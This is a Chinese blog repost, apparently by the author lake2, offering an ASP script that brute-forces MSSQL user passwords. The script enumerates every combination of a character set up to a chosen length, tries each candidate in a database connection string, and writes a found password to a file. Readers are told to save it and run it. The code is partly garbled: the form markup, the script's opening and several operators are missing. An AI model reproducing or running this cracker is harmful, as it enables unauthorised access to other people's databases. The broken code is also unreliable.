MSSQLCracker in ASP

yjd333

作者：lake2 来源：lake2的专栏
一个暴力破解MSSQL用户密码的ASP程序，最早发布在EST论坛。以下这个版本是可以运行之后关闭浏览器，运行完毕将在当前目录生成结果文件的。 用ASP做事情效率很慢，当然这个程序所体现的不是它的效率，而是……给你点悬念，不然多没意思哦。
自己把以下代码保存为ASP文件。当然我还是一如既往的BS那些只改作者名字的家伙。

程序代码
body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}
body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000FF;text-decoration: none;}
a:visited {text-decoration: none;color: #0000FF;}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
.styleRed {color: #FF0000}
MSSQL Cracker for SpringBoard
"1" Then
%>
Welcome to
http://lake2.0x54.org


ConnStr:


Char:     

   
Length:  

Path:     
" size="50">
Enablel
"" Then CreateResult("Done!" & vbcrlf & tTime)
End If
Sub LAKE(str)
If Len(str) >= length Then Exit Sub
For j = 1 to LenChar
pass = str & password(j)
If Len(pass) = length Then Call Crack(pass)
Call LAKE(pass)
Next
End Sub
Sub Crack(str)
On Error Resume Next
Set conn = Server.CreateObject("ADODB.connection")
conn.open Replace(ConnStr,"{PASS}",str)
If Err Then
If Err.Number  -2147217843 Then
response.Write(Err.Description & "
")
response.End()
End If
Else
response.Write("I Get it ! Password is " & str & "
Process " & tTime & " s")
If request.Form("CFile")  "" Then CreateResult(str & vbcrlf & tTime)
response.End()
End If
End Sub
Function tTime()
timer2 = timer
thetime=cstr(int(timer2-timer1))
tTime = thetime
End Function
Sub CreateResult(t)
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile = fs.CreateTextFile(request.Form("path"))
outfile.WriteLine t
Set fs = Nothing
End Sub
%>

本文来自ChinaUnix博客，如果查看原文请点：http://blog.chinaunix.net/u/21012/showart_155483.html